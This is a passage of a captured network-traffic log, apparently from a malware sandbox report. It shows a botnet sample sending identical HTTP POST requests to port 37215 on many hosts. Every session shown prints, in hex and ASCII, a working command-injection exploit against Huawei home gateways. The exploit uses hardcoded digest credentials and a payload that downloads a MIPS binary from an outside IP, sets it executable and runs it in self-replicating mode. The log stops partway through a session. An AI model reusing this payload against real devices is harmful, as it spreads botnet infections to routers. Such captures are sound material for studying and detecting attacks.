                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        257192.168.2.2356352137.213.113.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316310883 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        258192.168.2.2359996197.106.133.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316322088 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        259192.168.2.234138641.137.90.20637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316323996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        260192.168.2.235383641.250.111.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316334963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        261192.168.2.234939641.201.124.2937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316338062 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        262192.168.2.2360018197.164.15.16637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316343069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        263192.168.2.235606241.227.172.17337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316351891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        264192.168.2.2356080157.196.133.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316355944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        265192.168.2.2355000197.31.9.17937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316366911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        266192.168.2.234550869.245.203.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316370010 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
